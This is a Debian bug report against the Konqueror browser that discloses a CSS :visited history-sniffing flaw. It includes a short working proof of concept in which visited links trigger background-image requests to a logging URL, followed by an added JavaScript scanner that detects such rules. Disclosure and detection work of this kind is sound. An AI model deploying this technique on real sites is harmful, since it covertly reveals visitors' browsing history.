Subject: CSS visited elements allow for disclosure of user's browser history
Date: Sun, 18 Apr 2010 10:51:19 +0100
Package: konqueror
Version: 4:4.3.4-1
Severity: normal
There is a "Disclosure of user information" security flaw in the konqueror
browser due to the implementation of support for CSS :visited pseudoclass
elements. It is possible to specify a background-url attribute which will make
a request to the server if a particular link has been visited. Using this CSS
mechanism, it is possible for a hosting server to determine visited links
without using Javascript.
For example:
<style>
a#link1:visited { background-image: url(/log?link1_was_visited); }
a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1"></a>
<a href="http://yahoo.com" id="link2"></a>
If link1 (http://google.com) has been visited, the browser will make a request
back to the server to retrieve the background for the #link1 rule. By
appending a different URL argument to each rule we can determine which of the
links were visited. Please note that this requires no client-side scripting
whatsoever, and only relies on the availability of CSS.
The following website demonstrates a working exploit of this vulnerability:
http://www.whattheinternetknowsaboutyou.com/
Mark.
-- System Information:
Debian Release: squeeze/sid
APT prefers testing
APT policy: (60, 'testing'), (50, 'unstable')
Architecture: i386 (i386)
Kernel: Linux 2.6.26-2-486
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash
Versions of packages konqueror depends on:
ii install-info 4.13a.dfsg.1-4 Manage installed documentation in
ii kdebase-bin 4:4.3.4-1 core binaries for the KDE 4 base m
ii kdebase-data 4:4.3.4-1 shared data files for the KDE 4 ba
ii kdebase-runtime 4:4.3.1-1 runtime components from the offici
ii kdelibs5 4:4.3.4-3 core libraries for all KDE 4 appli
ii libc6 2.10.2-2 GNU C Library: Shared libraries
ii libkonq5 4:4.3.4-1 core libraries for Konqueror
ii libkonqsidebarplugin4 4:4.3.4-1 Konqueror sidebar plugin library
ii libqt4-dbus 4:4.5.3-4 Qt 4 D-Bus module
ii libqt4-qt3support 4:4.5.3-4 Qt 3 compatibility library for Qt
ii libqt4-xml 4:4.5.3-4 Qt 4 XML module
ii libqtcore4 4:4.5.3-4 Qt 4 core module
ii libqtgui4 4:4.5.3-4 Qt 4 GUI module
ii libstdc++6 4.4.2-9 The GNU Standard C++ Library v3
ii libx11-6 2:1.2.2-1 X11 client-side library
Versions of packages konqueror recommends:
ii dolphin 4:4.3.4-1 file manager for KDE 4
ii konqueror-nsplugins 4:4.3.4-1 Netscape plugin support for Konque
Versions of packages konqueror suggests:
pn konq-plugins <none> (no description available)
-- no debconf information
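
A stylesheet check for the pattern described in this report, as an added example that is not part of the original bug report or of Konqueror: it flags rules whose selector contains :visited and whose declarations reference url(...), so that styling a visited link can cause a request. The function name and the sample stylesheet are constructed for illustration, and the regex-based scan assumes no ';' or braces inside url() values.

```javascript
// Added example (not from the bug report): find CSS rules where a
// :visited selector carries a url(...) value, i.e. where matching a
// visited link makes the browser fetch a resource.

// Constructed sample: the two rules from the report plus benign rules.
const SAMPLE_CSS = `
/* a:visited { background: url(/ignored-in-comment); } */
a#link1:visited { background-image: url(/log?link1_was_visited); }
a#link2:visited { background-image: url(/log?link2_was_visited); }
a:visited { color: purple; }
a:hover { background-image: url(/img/hover.png); }
`;

function findVisitedFetchRules(cssText) {
  // Drop comments first so commented-out rules are not reported.
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  const findings = [];
  // Innermost "selector { declarations }" pairs; this also picks up
  // rules nested inside an @media block.
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(css)) !== null) {
    const visited = m[1]
      .split(",")
      .map((s) => s.trim())
      .filter((s) => /:visited\b/i.test(s));
    if (visited.length === 0) continue;
    for (const decl of m[2].split(";")) {
      const idx = decl.indexOf(":");
      if (idx < 0) continue;
      const property = decl.slice(0, idx).trim().toLowerCase();
      const value = decl.slice(idx + 1);
      // Accept url(x), url('x') and url("x").
      const u = /url\(\s*(['"]?)(.*?)\1\s*\)/i.exec(value);
      if (u) {
        findings.push({ selector: visited.join(", "), property, url: u[2] });
      }
    }
  }
  return findings;
}

console.log(findVisitedFetchRules(SAMPLE_CSS));
```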